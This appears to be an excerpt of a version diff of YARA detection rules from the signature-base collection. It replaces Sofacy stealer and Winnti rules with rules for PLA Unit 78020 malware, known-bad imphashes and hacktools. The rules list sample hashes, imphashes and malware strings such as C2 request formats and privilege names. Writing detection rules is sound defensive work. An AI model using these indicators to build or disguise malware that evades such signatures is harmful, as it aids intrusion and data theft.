+		hash2 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
+		hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a"
 
 	strings:
-		$s0 = "snd.dll" fullword ascii
-		$s1 = "InternetExchange" fullword ascii
-		$s2 = "SendData"
+		$s0 = "-GetModuleFileNameExW" fullword ascii
+		$s1 = "\\MSN Talk Start.lnk" wide
+		$s2 = ":SeDebugPrivilege" fullword wide
+		$s3 = "WinMM Version 1.0" fullword wide
+		$s4 = "dwError1 = %d" fullword ascii
+		$s5 = "*Can't Get" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen1 : FILE
+rule SIGNATURE_BASE_Unit78020_Malware_Gen3 : FILE
 {
 	meta:
-		description = "Generic rule to detect Sofacy Malware Collector Stealer"
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f9462dd9-f6b6-59f4-a443-12d6f3be444e"
-		date = "2015-12-04"
+		id = "e26f386e-e98c-5005-9343-1873d2e35a1f"
+		date = "2015-09-24"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L80-L97"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L103-L132"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1b6693fa45fed5ed001d8fb4b43427c7036d95cb36b125e7242864d000085018"
+		logic_hash = "304b3f429e144f1f4b0f7794e77f3059ec6b3e5c6fdf4c7b820a77db1cf8cfcb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
-		hash2 = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+		hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
+		hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
 
 	strings:
-		$s0 = "NvCpld.dll" fullword ascii
-		$s1 = "NvStop" fullword ascii
-		$s2 = "NvStart" fullword ascii
+		$x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+		$x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+		$x3 = "J:\\chong\\" ascii
+		$s1 = "User-Agent: Netscape" fullword ascii
+		$s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii
+		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide
+		$s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii
+		$s5 = "MM.exe" fullword ascii
+		$s6 = "network.proxy.ssl" fullword wide
+		$s7 = "PeekNamePipe" fullword ascii
+		$s8 = "Host: %ws:%d" fullword ascii
+		$s9 = "GET %dHTTP/1.1" fullword ascii
+		$s10 = "SCHANNEL.DLL" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or 4 of ( $s* )
 }
-rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen2 : FILE
+
+rule SIGNATURE_BASE_MAL_Malware_Imphash_Mar23_1 : HIGHVOL FILE
 {
 	meta:
-		description = "File collectors / USB stealers - Generic"
-		author = "Florian Roth (Nextron Systems)"
-		id = "03ced94f-de20-56c5-bf17-1ec7d8610684"
-		date = "2015-12-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L99-L116"
+		description = "Detects malware by known bad imphash or rich_pe_header_hash"
+		author = "Arnim Rupp"
+		id = "fb398c26-e9ac-55f9-b605-6b763021e96a"
+		date = "2023-03-20"
+		modified = "2023-03-22"
+		reference = "https://yaraify.abuse.ch/statistics/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L4-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e917166adf6e1135444f327d8fff6ec6c6a8606d65dda4e24c2f416d23b69d45"
-		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
-		hash = "b1f2d461856bb6f2760785ee1af1a33c71f84986edf7322d3e9bd974ca95f92d"
-		logic_hash = "2086b4119bae17ec984665ea1e49d5f496a2cf6bf05ab507fe0cfb6e28039349"
+		hash = "167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc"
+		hash = "0a25a78c6b9df52e55455f5d52bcb3816460001cae3307b05e76ac70193b0636"
+		hash = "d87a35decd0b81382e0c98f83c7f4bf25a2b25baac90c9dcff5b5a147e33bcc8"
+		hash = "5783bf969c36f13f4365f4cae3ec4ee5d95694ff181aba74a33f4959f1f19e8b"
+		hash = "4ca925b0feec851d787e7ee42d263f4c08b0f73f496049bdb5d967728ff91073"
+		hash = "9c2d2fa9c32fdff1828854e8cc39160dae73a4f90fb89b82ef6d853b63035663"
+		hash = "2c53d58f30b2ee1a2a7746e20f136c34d25d0214261783fc67e119329d457c2a"
+		hash = "5e83747015b0589b4f04b0db981794adf53274076c1b4acf717e3ff45eca0249"
+		hash = "ceaa0af90222ff3a899b9a360f6328cbda9ec0f5fbd18eb44bdc440470bb0247"
+		hash = "82fb1ba998dfee806a513f125bb64c316989c36c805575914186a6b45da3b132"
+		hash = "cb41d2520995abd9ba8ccd42e53d496a66da392007ea6aebd4cbc43f71ad461a"
+		hash = "c7bd758506b72ee6db1cc2557baf745bf9e402127d8e49266cc91c90f3cf3ed5"
+		hash = "e6e0d60f65a4ea6895ff97df340f6d90942bbfa402c01bf443ff5b4641ff849f"
+		hash = "e8ddef9fa689e98ba2d48260aea3eb8fa41922ed718b7b9135df6426b3ddf126"
+		hash = "ad57d77aba6f1bf82e0affe4c0ae95964be45fb3b7c2d6a0e08728e425ecd301"
+		hash = "483df98eb489899bc89c6a0662ca8166c9b77af2f6bedebd17e61a69211843d9"
+		hash = "a65ed85851d8751e6fe6a27ece7b3879b90866a10f272d8af46fb394b46b90a9"
+		hash = "09081e04f3228d6ef2efc1108850958ed86026e4dfda199852046481f4711565"
+		hash = "1b2c9054f44f7d08cffe7e2d9127dbd96206ab2c15b63ebf6120184950336ae1"
+		hash = "257887d1c84eb15abb2c3c0d7eb9b753ca961d905f4979a10a094d0737d97138"
+		hash = "1cbad8b58dbd1176e492e11f16954c3c254b5169dde52b5ad6d0d3c51930abf8"
+		hash = "a9897fd2d5401071a8219b05a3e9b74b64ad67ab75044b3e41818e6305a8d7b9"
+		hash = "aeac45fbc5d2a59c9669b9664400aeaf6699d76a57126d2f437833a3437a693e"
+		hash = "7b4c4d4676fab6c009a40d370e6cb53ea4fd73b09c23426fbaccc66d652f2a00"
+		hash = "b07f6873726276842686a6a6845b361068c3f5ce086811db05c1dc2250009cd0"
+		hash = "d1b3afebcacf9dd87034f83d209b42b0d79e66e08c0a897942fbe5fbd6704a0e"
+		hash = "074d52be060751cf213f6d0ead8e9ab1e63f055ae79b5fcbe4dd18469deea12b"
+		hash = "84d1fdef484fa9f637ae3d6820c996f6c5cf455470e8717ad348a3d80d2fb8e0"
+		hash = "437da123e80cfd10be5f08123cd63cfc0dc561e17b0bef861634d60c8a134eda"
+		hash = "f76c36eb22777473b88c6a5fc150fd9d6b5fac5b2db093f0ccd101614c46c7e7"
+		hash = "5498b7995669877a410e1c2b68575ca94e79014075ef5f89f0f1840c70ebf942"
+		hash = "af4e633acfba903e7c92342b114c4af4e694c5cfaea3d9ea468a4d322b60aa85"
+		hash = "d7d870f5afab8d4afa083ea7d7ce6407f88b0f08ca166df1a1d9bdc1a46a41b3"
+		hash = "974209d88747fbba77069bb9afa9e8c09ee37ae233d94c82999d88dfcd297117"
+		hash = "f2d99e7d3c59adf52afe0302b298c7d8ea023e9338c2870f74f11eaa0a332fc4"
+		hash = "b32c93be9320146fc614fafd5e6f1bb8468be83628118a67eb01c878f941ee5d"
+		hash = "bbd99acc750e6457e89acbc5da8b2a63b4ef01d4597d160e9cde5dc8bd04cf74"
+		hash = "dbff5ca3d1e18902317ab9c50be4e172640a8141e09ec13dcca986f2ec1dc395"
+		hash = "3ee1741a649f0b97bbeb05b6f9df97afda22c82e1e870177d8bdd34141ef163c"
+		hash = "222096fc800c8ea2b0e530302306898b691858324dbe5b8357f90407e9665b85"
+		hash = "b9995d1987c4e8b6fb30d255948322cfad9cc212c7f8f4c5db3ac80e23071533"
+		hash = "a6a92ea0f27da1e678c15beb263647de43f68608afe82d6847450f16a11fe6c0"
+		hash = "866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37"
+		logic_hash = "dcb4d9a1ca83bbd26178895f20f9ab443f48f42aa3ad3df042c763c24ce8c047"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	strings:
-		$s1 = "msdetltemp.dll" fullword ascii
-		$s2 = "msdeltemp.dll" fullword wide
-		$s3 = "Delete Temp Folder Service" fullword wide
+		$fp1 = "Win32 Cabinet Self-Extractor" wide
+		$fp2 = "EXTRACTOPT" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "9ee34731129f4801db97fd66adbfeaa0" or pe.imphash ( ) == "f9e8597c55008e10a8cdc8a0764d5341" or pe.imphash ( ) == "0a76016a514d8ed3124268734a31e2d2" or pe.imphash ( ) == "d3cbd6e8f81da85f6bf0529e69de9251" or pe.imphash ( ) == "d8b32e731e5438c6329455786e51ab4b" or pe.imphash ( ) == "cdf5bbb8693f29ef22aef04d2a161dd7" or pe.imphash ( ) == "890e522b31701e079a367b89393329e6" or pe.imphash ( ) == "bf5a4aa99e5b160f8521cadd6bfe73b8" or pe.imphash ( ) == "646167cce332c1c252cdcb1839e0cf48" or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" or pe.imphash ( ) == "b4c6fff030479aa3b12625be67bf4914" ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen3 : FILE
+
+rule SIGNATURE_BASE_HKTL_Imphashes_Aug22_1 : FILE
 {
 	meta:
-		description = "File collectors / USB stealers - Generic"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d2ee1a22-6aae-51fc-9043-a7ba99769376"
-		date = "2015-12-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L118-L143"
+		description = "Detects different hacktools based on their imphash"
+		author = "Florian Roth"
+		id = "e1d4dde6-16ad-5495-b3a7-01a86c830761"
+		date = "2022-08-17"
+		modified = "2023-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L93-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
-		hash = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
-		logic_hash = "8e7f56013629d8b4d0c7600552590e8073deb16d5b6dced11444c2110b88f387"
-		score = 75
+		logic_hash = "e76701b889138f9635cfe3a2f08710db3a6f0a3c3a15faa705ff0904d0566a1f"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	strings:
-		$s1 = "NvCpld.dll" fullword ascii
-		$s4 = "NvStart" fullword ascii
-		$s5 = "NvStop" fullword ascii
-		$a1 = "%.4d%.2d%.2d%.2d%.2d%.2d%.2d%.4d" fullword wide
-		$a2 = "IGFSRVC.dll" fullword wide
-		$a3 = "Common User Interface" fullword wide
-		$a4 = "igfsrvc Module" fullword wide
-		$b1 = " Operating System                        " fullword wide
-		$b2 = "Microsoft Corporation                                       " fullword wide
+	condition:
+		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "bcca3c247b619dcd13c8cdff5f123932" or pe.imphash ( ) == "3a19059bd7688cb88e70005f18efc439" or pe.imphash ( ) == "bf6223a49e45d99094406777eb6004ba" or pe.imphash ( ) == "0c106686a31bfe2ba931ae1cf6e9dbc6" or pe.imphash ( ) == "0d1447d4b3259b3c2a1d4cfb7ece13c3" or pe.imphash ( ) == "1b0369a1e06271833f78ffa70ffb4eaf" or pe.imphash ( ) == "4c1b52a19748428e51b14c278d0f58e3" or pe.imphash ( ) == "4d927a711f77d62cebd4f322cb57ec6f" or pe.imphash ( ) == "66ee036df5fc1004d9ed5e9a94a1086a" or pe.imphash ( ) == "672b13f4a0b6f27d29065123fe882dfc" or pe.imphash ( ) == "6bbd59cea665c4afcc2814c1327ec91f" or pe.imphash ( ) == "725bb81dc24214f6ecacc0cfb36ad30d" or pe.imphash ( ) == "9528a0e91e28fbb88ad433feabca2456" or pe.imphash ( ) == "9da6d5d77be11712527dcab86df449a3" or pe.imphash ( ) == "a6e01bc1ab89f8d91d9eab72032aae88" or pe.imphash ( ) == "b24c5eddaea4fe50c6a96a2a133521e4" or pe.imphash ( ) == "d21bbc50dcc169d7b4d0f01962793154" or pe.imphash ( ) == "fcc251cceae90d22c392215cc9a2d5d6" or pe.imphash ( ) == "23867a89c2b8fc733be6cf5ef902f2d1" or pe.imphash ( ) == "a37ff327f8d48e8a4d2f757e1b6e70bc" or pe.imphash ( ) == "f9a28c458284584a93b14216308d31bd" or pe.imphash ( ) == "6118619783fc175bc7ebecff0769b46e" or pe.imphash ( ) == "959a83047e80ab68b368fdb3f4c6e4ea" or pe.imphash ( ) == "563233bfa169acc7892451f71ad5850a" or pe.imphash ( ) == "87575cb7a0e0700eb37f2e3668671a08" or pe.imphash ( ) == "13f08707f759af6003837a150a371ba1" or pe.imphash ( ) == "1781f06048a7e58b323f0b9259be798b" or pe.imphash ( ) == "233f85f2d4bc9d6521a6caae11a1e7f5" or pe.imphash ( ) == "24af2584cbf4d60bbe5c6d1b31b3be6d" or pe.imphash ( ) == "632969ddf6dbf4e0f53424b75e4b91f2" or pe.imphash ( ) == "713c29b396b907ed71a72482759ed757" or pe.imphash ( ) == "749a7bb1f0b4c4455949c0b2bf7f9e9f" or pe.imphash ( ) == "8628b2608957a6b0c6330ac3de28ce2e" or pe.imphash ( ) == "8b114550386e31895dfab371e741123d" or pe.imphash ( ) == "94cb940a1a6b65bed4d5a8f849ce9793" or pe.imphash ( ) == "9d68781980370e00e0bd939ee5e6c141" or pe.imphash ( ) == "b18a1401ff8f444056d29450fbc0a6ce" or pe.imphash ( ) == "cb567f9498452721d77a451374955f5f" or pe.imphash ( ) == "730073214094cd328547bf1f72289752" or pe.imphash ( ) == "17b461a082950fc6332228572138b80c" or pe.imphash ( ) == "dc25ee78e2ef4d36faa0badf1e7461c9" or pe.imphash ( ) == "819b19d53ca6736448f9325a85736792" or pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or pe.imphash ( ) == "c547f2e66061a8dffb6f5a3ff63c0a74" or pe.imphash ( ) == "0588081ab0e63ba785938467e1b10cca" or pe.imphash ( ) == "0d9ec08bac6c07d9987dfd0f1506587c" or pe.imphash ( ) == "bc129092b71c89b4d4c8cdf8ea590b29" or pe.imphash ( ) == "4da924cf622d039d58bce71cdf05d242" or pe.imphash ( ) == "e7a3a5c377e2d29324093377d7db1c66" or pe.imphash ( ) == "9a9dbec5c62f0380b4fa5fd31deffedf" or pe.imphash ( ) == "af8a3976ad71e5d5fdfb67ddb8dadfce" or pe.imphash ( ) == "0c477898bbf137bbd6f2a54e3b805ff4" or pe.imphash ( ) == "0ca9f02b537bcea20d4ea5eb1a9fe338" or pe.imphash ( ) == "3ab3655e5a14d4eefc547f4781bf7f9e" or pe.imphash ( ) == "e6f9d5152da699934b30daab206471f6" or pe.imphash ( ) == "3ad59991ccf1d67339b319b15a41b35d" or pe.imphash ( ) == "ffdd59e0318b85a3e480874d9796d872" or pe.imphash ( ) == "0cf479628d7cc1ea25ec7998a92f5051" or pe.imphash ( ) == "07a2d4dcbd6cb2c6a45e6b101f0b6d51" or pe.imphash ( ) == "d6d0f80386e1380d05cb78e871bc72b1" or pe.imphash ( ) == "38d9e015591bbfd4929e0d0f47fa0055" or pe.imphash ( ) == "0e2216679ca6e1094d63322e3412d650" or pe.imphash ( ) == "ada161bf41b8e5e9132858cb54cab5fb" or pe.imphash ( ) == "2a1bc4913cd5ecb0434df07cb675b798" or pe.imphash ( ) == "11083e75553baae21dc89ce8f9a195e4" or pe.imphash ( ) == "a23d29c9e566f2fa8ffbb79267f5df80" or pe.imphash ( ) == "4a07f944a83e8a7c2525efa35dd30e2f" or pe.imphash ( ) == "767637c23bb42cd5d7397cf58b0be688" or pe.imphash ( ) == "14c4e4c72ba075e9069ee67f39188ad8" or pe.imphash ( ) == "3c782813d4afce07bbfc5a9772acdbdc" or pe.imphash ( ) == "7d010c6bb6a3726f327f7e239166d127" or pe.imphash ( ) == "89159ba4dd04e4ce5559f132a9964eb3" or pe.imphash ( ) == "6f33f4a5fc42b8cec7314947bd13f30f" or pe.imphash ( ) == "5834ed4291bdeb928270428ebbaf7604" or pe.imphash ( ) == "5a8a8a43f25485e7ee1b201edcbc7a38" or pe.imphash ( ) == "dc7d30b90b2d8abf664fbed2b1b59894" or pe.imphash ( ) == "41923ea1f824fe63ea5beb84db7a3e74" or pe.imphash ( ) == "3de09703c8e79ed2ca3f01074719906b" or pe.imphash ( ) == "a53a02b997935fd8eedcb5f7abab9b9f" or pe.imphash ( ) == "e96a73c7bf33a464c510ede582318bf2" or pe.imphash ( ) == "32089b8851bbf8bc2d014e9f37288c83" or pe.imphash ( ) == "09D278F9DE118EF09163C6140255C690" or pe.imphash ( ) == "03866661686829d806989e2fc5a72606" or pe.imphash ( ) == "e57401fbdadcd4571ff385ab82bd5d6d" or pe.imphash ( ) == "84B763C45C0E4A3E7CA5548C710DB4EE" or pe.imphash ( ) == "19584675d94829987952432e018d5056" or pe.imphash ( ) == "330768a4f172e10acb6287b87289d83b" )
+}
+
+rule SIGNATURE_BASE_SUSP_Imphash_Mar23_2 : HIGHVOL FILE
+{
+	meta:
+		description = "Detects imphash often found in malware samples (Zero hits with with search for 'imphash:x p:0' on Virustotal)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b739d540-5d9f-53b3-9e42-a514dc972e8d"
+		date = "2023-03-23"
+		modified = "2023-11-25"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L194-L295"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4"
+		hash = "14ec56489fbcc3c7f1ef9a4d4a80ff302a5e233cdc4429a29c635a88fb1278d6"
+		hash = "13731912823d6ce01c28a8d7d7f961505f461620bb35adbb409d4954ba1f4b8e"
+		hash = "15e59cc5d7b83e63d40dbfd8406701cb4decd31353f68fda47238d073c87e4ea"
+		hash = "13e5bb40be20b1a0bc28081ce7798f339c28c9652cb37b538c29872dfd0cd51d"
+		hash = "16f963afdb30b38ba4b8b98ce56a37626e9fd87de9eba5f9903d2ba7f8a77788"
+		hash = "168f22d02304ce66be88d2370c8fa7c7d9aa2ccf80f8e376edfeabfc9b96c73d"
+		hash = "9e7701450dbcbd35083e34df935bd77a95735c4b441e0fc8eacd543a621f2fa5"
+		hash = "51205c100702b21cce600692d69f3b108f49228e53f36678dd8b39434406526b"
+		hash = "c9b48e8b0e7c6fa75886554659bc0529e454d84b29daa07bd4323aca9a33f607"
+		hash = "ba5c06703bd3c093afa89e45d86aaf6c151fbaef44ebf3b65c97f3b376a88c72"
+		hash = "7281afc138e8e898aee16d415cd02a29dc5dedda5b11c23934aac0ebd208373b"
+		hash = "10a091b2468a8286f7b1a580d8923aef48856b43014e849035f05c4dbdc0a413"
+		hash = "56c04e76427bd982be83799d0a435732193d7bf5a70cdeba5eb63eaf0d4ebb77"
+		hash = "0aa8b7eddc4792a82f247702442c04e50173bd7712a4b596545916480942853b"
+		hash = "627f043ad875c182682149653363b7f856dd618d169821b18df7bc9cdf6269d8"
+		hash = "e1df460fd99c4f901859f3a8ec23b041ba9f4b79897dec349a96d6a27fb3e335"
+		hash = "f10ecbd8031ce85b782c59682ff32301a65e0975687977688771f1057fb063d1"
+		hash = "1bc7b8932b5b077b359c79e7ca664938b7a487a4e7e6b99d6647d6803bc677c5"
+		hash = "01f81029a5e93cbfecfbc81cbd4a2ffd1bb1b6159e2a144a21e58caf8dab9661"
+		hash = "cd33a71f71e2971667bacb0da71f2d36073777993b9581ec90bbf042162c3530"
+		hash = "4aab991149cb2dc8c0c0a323af3acbbd73d6a22177910ef3af92b05ae7c9ae7b"
+		hash = "df05fa3983c9e623388231d366dba4e435575ca53421d3f0bcb0fb346dd971d4"
+		hash = "14de3584fe7108386f7637c2bd343f30341c0fa2102d52bb35ee772b5b7672f0"
+		hash = "c4d9ad5cffd9aa13dfe3acbf0905810e28ff96d231541d7e209327ca5b0b24fe"
+		hash = "5e0bed2269dc34c6cc2db30b0a53282e6debb85b3c90a857d1be4cfd06312211"
+		hash = "3aa13e72382a2d7da592273b8c18a42106b65db528e16b6066646812e81555c4"
+		hash = "244c4a930e3644ffb96bf3ab33e8c8c0f94ed9fe6a8b2fc45fc8e9b6471ef3a8"
+		hash = "f00848b8edeeb5a668bf7e89e3f33f438b2f5d5cf130596a8ed2531e21be6d81"
+		hash = "5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e"
+		logic_hash = "c6482cbc01a880ffd3056d28a2fde8f87402b1f85d36075c1f0b50788d469ca3"
+		score = 65
+		quality = 85
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $s* ) and ( all of ( $a* ) or all of ( $b* ) ) )
+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" or pe.imphash ( ) == "8abecba2211e61763c4c9ffcaa13369e" or pe.imphash ( ) == "a64e048b98d051ae6e6b6334f77c95d3" or pe.imphash ( ) == "359d89624a26d1e756c3e9d6782d6eb0" or pe.imphash ( ) == "c2a87fabf96470db507b2e6b43bd92eb" or pe.imphash ( ) == "62ec3dce1eba1b68f6a4511bb09f8c2c" or pe.imphash ( ) == "5662cfcdfd9da29cb429e7528d5af81e" or pe.imphash ( ) == "406c785a6e2c6970c1e8ed62877e197b" or pe.imphash ( ) == "dbf687d6aa2a6cafe4349f7b0821a792" or pe.imphash ( ) == "6dca3e9fb3928bbdb54dbce669943ec8" or pe.imphash ( ) == "f1a539a5b71ad53ac586f053145f08ec" or pe.imphash ( ) == "3a2003ea545fe942681da9e7683ebb58" or pe.imphash ( ) == "a8286b574ff850cd002ea6282d15aa40" or pe.imphash ( ) == "3c8577ca4bab2f95cc6fc73ef1895288" or pe.imphash ( ) == "84706849fa809feaa385711a628be029" or pe.imphash ( ) == "ba23a556ac1d6444f7f76feafd6c8867" or pe.imphash ( ) == "95e6f8741083e0c7d9a63d45e2472360" or pe.imphash ( ) == "774d797db707398fd2ef1979d02634d5" or pe.imphash ( ) == "8c16c795b57934183422be5f6df7d891" or pe.imphash ( ) == "98f67c550a7da65513e63ffd998f6b2e" or pe.imphash ( ) == "e836076a09dba03e4d6faa46dda0fefc" or pe.imphash ( ) == "ff63dc9c65eb25911a9bc535c8f06ad0" or pe.imphash ( ) == "08b67a9663d3a8c9505f3b2561bbdd1c" or pe.imphash ( ) == "135e92fc9902f3140f2e5a51458efdf0" or pe.imphash ( ) == "4753904c40d638a1bc745c65b88291d5" or pe.imphash ( ) == "0f44bf2b3b0b8d5ecae5689ff1d0e90d" or pe.imphash ( ) == "c4c9ecfc26ca516a80b8f6f5b2bdb7e6" or pe.imphash ( ) == "46ad3d954e527f769e37017b3e128039" or pe.imphash ( ) == "802dcac7aab948c19738ba3df9f356d9" or pe.imphash ( ) == "b36a21279375c40e6f4c1ea347f906de" or pe.imphash ( ) == "77a185e903c5527243ef219b003bfd38" or pe.imphash ( ) == "12a30b523ac71a3cbe9145c89400dd7f" or pe.imphash ( ) == "cc40fefa3af5cd00cc28dbd874038a4d" or pe.imphash ( ) == "3d8c26f4cb1782a87c3bb42796fb6b85" or pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.imphash ( ) == "76812f441b0ed9d3cc0748af25d689a3" or pe.imphash ( ) == "9a06f0024c1694774ae97311608bab5b" or pe.imphash ( ) == "481f47bbb2c9c21e108d65f52b04c448" or pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or pe.imphash ( ) == "a0db151d55761167d93eba72d3d94b32" or pe.imphash ( ) == "663243fe4d94e1304b265ce4011cd01b" or pe.imphash ( ) == "f24e64014af9015dc25262e5076fe61f" or pe.imphash ( ) == "b7d08302c927428e16a2ad8d18b9d2b7" or pe.imphash ( ) == "352063077f27a851dc2b08e15f08105e" or pe.imphash ( ) == "b0b97d1a91a2730b3daa8bbb2e86b402" or pe.imphash ( ) == "bc96f1c981700752dc2cf9553da99eb6" or pe.imphash ( ) == "f68ddef5f29b66bbd543e947c8743bb0" or pe.imphash ( ) == "6dfbc160505aa2f7205766eaa6fe72a1" or pe.imphash ( ) == "a202429ffe8d8c8b722572cffd5681a7" or pe.imphash ( ) == "342a3708d93b6b819b7b1a768201a747" or pe.imphash ( ) == "cdc00badc7162acde9bb032e793ac137" or pe.imphash ( ) == "be19e18d6a8b41631d40059031a928bb" or pe.imphash ( ) == "0c54f96a844b02689687407de9b6663e" or pe.imphash ( ) == "fa5f28e70130a452b7c0a51db5544ef9" or pe.imphash ( ) == "2e5708ae5fed0403e8117c645fb23e5b" or pe.imphash ( ) == "8d92fa1956a6a631c642190121740197" or pe.imphash ( ) == "dc73a9bd8de0fd640549c85ac4089b87" )
 }
-rule SIGNATURE_BASE_Winnti_Fonfig : FILE
+
+rule SIGNATURE_BASE_SUSP_Imphash_Mar23_3 : FILE
 {
 	meta:
-		description = "Winnti sample - file fonfig.exe"
+		description = "Detects imphash often found in malware samples (Maximum 0,25% hits with search for 'imphash:x p:0' on Virustotal) = 99,75% hits"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "eb91e700-6478-5085-a393-a7b342c0eb4f"
+		date = "2023-03-23"
+		modified = "2025-08-15"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L297-L329"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "b5296cf0eb22fba6e2f68d0c9de9ef7845f330f7c611a0d60007aa87e270c62a"
+		hash = "5a5a5f71c2270cea036cd408cde99f4ebf5e04a751c558650f5cb23279babe6d"
+		hash = "481b0d9759bfd209251eccb1848048ebbe7bd2c87c5914a894a5bffc0d1d67ff"
+		hash = "716ba6ea691d6a391daedf09ae1262f1dc1591df85292bff52ad76611666092d"
+		hash = "800d160736335aafab10503f7263f9af37a15db3e88e41082d50f68d0ad2dabd"
+		hash = "416155124784b3c374137befec9330cd56908e0e32c70312afa16f8220627a52"
+		hash = "21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070"
+		hash = "0461830e811d3831818dac5a67d4df736b4dc2e8fb185da439f9338bdb9f69c3"
+		hash = "773edc71d52361454156dfd802ebaba2bb97421ce9024a7798dcdee3da747112"
+		hash = "fe53b9d820adf3bcddf42976b8af1411e87d9dfd9aa479f12b2db50a5600f348"
+		logic_hash = "c7974beb40e973463a3ef9e8970194c8684f79c63811ece2d66fe446858283c2"
+		score = 45
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+
+	condition:
